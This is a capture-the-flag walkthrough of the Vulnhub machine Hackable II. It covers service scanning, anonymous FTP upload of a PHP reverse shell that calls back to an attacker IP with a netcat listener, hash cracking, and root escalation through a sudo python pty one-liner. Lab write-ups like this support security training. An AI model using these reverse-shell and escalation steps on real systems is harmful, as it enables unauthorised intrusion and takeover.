Hackable II – Vulnhub

NameValue
AuthorElias Sousa
Page URLhttps://www.vulnhub.com/entry/hackable-ii,711/
Release15 Jun 2021

Setting up the Target Machine

Just download and double-click the .ova file to load it in your VirtualBox.

⚠️ Important – Make sure the machine network is already set to "Bridged Adapter". (Check with: Right Click on Machine -> Settings -> Network)

Start the machine and wait until this screen appears:

From the description, log in with the credentials shrek:onion to check the target IP address.

Run the ifconfig command; in my case, the IP address is: 192.168.18.51. Let's dig in…

Performing Reconnaissance on the Target

First, run nmap to check the services and versions…

bash
nmap -sV 192.168.18.51

MITRE TECHNIQUE: Network Service Discovery
MITRE ID: T1046

It showed only three services: ftp, ssh and http. HTTP means there is a website, so visit the IP address in the browser.

It shows the default Apache page. It seems like the developers forgot to host the website here, but in the comments it says:

html
<!-- Do you like gobuster? dirb? etc... -->

Which eventually leads to directory and file fuzzing…

Searching for Directories

bash
gobuster dir -u http://192.168.18.51/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

MITRE TECHNIQUE: File & Directory Discovery
MITRE ID: T1083

Only /files caught my attention, but visiting it leads to a CALL.html file which shows this content:

I don't quite understand that, but it seems like a dead end or an important file at the same time.

So I ran a scanner for web vulnerabilities here.

Scanning the Web (rabbit_hole)

Used nikto for this task:

bash
nikto -host 192.168.18.51

Nothing important was found by nikto here; it seems like I have fallen into a rabbit hole.

Checking FTP

Leaving the website, I jumped to check FTP for anonymous login. And to my surprise, it worked…

MITRE TECHNIQUE: Valid Accounts: Default Accounts
MITRE ID: T1078.001

I fooled around for a while and noticed that this was the same directory where CALL.html was. I uploaded a test file and it showed up in the /files directory.

Attacking the Target Machine

Now I am thinking of uploading a reverse shell.

Setting up a reverse PHP shell

I copied the reverse shell file from the webshells folder to the current working directory:

bash
cp /usr/share/webshells/php/php-reverse-shell.php .

I opened it and edited the $ip and $port variables to 192.168.18.61 (attacker IP) and 4444 respectively. One addition I made to the file is a single line of HTML code for checking whether the file is executed or not (completely optional).

I renamed the file to shell.php and uploaded it:

bash
put shell.php

Before opening the file in the browser, open a terminal and run the following:

bash
nc -lvnp 4444

so that our attacker machine gets the connection when it is sent from the target machine.

MITRE TECHNIQUE: Server Software Component: Web Shell
MITRE ID: T1505.003

Troubleshooting

Instead of getting a shell, it showed this line in the browser WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110).

I dug into it and found out that my firewall was blocking it, so I disabled it:

bash
sudo ufw disable

Exploring the System

I tried to navigate around the system, but certain functionalities were limited, so I upgraded to an interactive shell with:

bash
script /dev/null -c bash

The runme.sh File

Upon navigating to the /home directory, I found a text file named important.txt, which told me to run a .runme.sh file. It gave me two things:

  1. The secret key is trolled (I still don't know where I may use this key)
  2. A username shrek with the hash of its password.

MITRE TECHNIQUE: Unsecured Credentials: Credentials In Files
MITRE ID: T1552.001

First, try to crack the hash via CrackStation, an online resource to look up already cracked hashes. It returned:

MITRE TECHNIQUE: Password Cracking
MITRE ID: T1110

The rest of the files were not readable by me.

Log in as user shrek

So the username shrek has the password of onion (I already knew that from the description, but finding it this way gives me the authority to use it now)

bash
su shrek # give the password when prompted!

MITRE TECHNIQUE: Valid Accounts: Local Accounts
MITRE ID: T1078.003

I was curious about the user.txt file, but it appears to contain a LinkedIn URL of the author of this machine.

The Bash History File

I checked the .bash_history file, which contained some sudo commands, so I checked with:

bash
sudo -l

and came to know that the user shrek could run python as root!

MITRE TECHNIQUE: Abuse Elevation Control Mechanism: Sudo and Sudo Caching
MITRE ID: T1548.003

I got root!

So I simply ran:

bash
sudo python3.5 -c 'import pty; pty.spawn("/bin/bash")'

and expected a root shell. And yes, it fulfilled my expectations!

MITRE TECHNIQUE: Command and Scripting Interpreter: Python
MITRE ID: T1059.006

Cleaning Up

Revert all the necessary things you changed to avoid any problems.

Enable Firewall

bash
sudo ufw enable

Which was disabled for the reverse shell.

Remove the Shell Files

From the working directory, I removed the reverse shell files because they were no longer needed!

Leave a Comment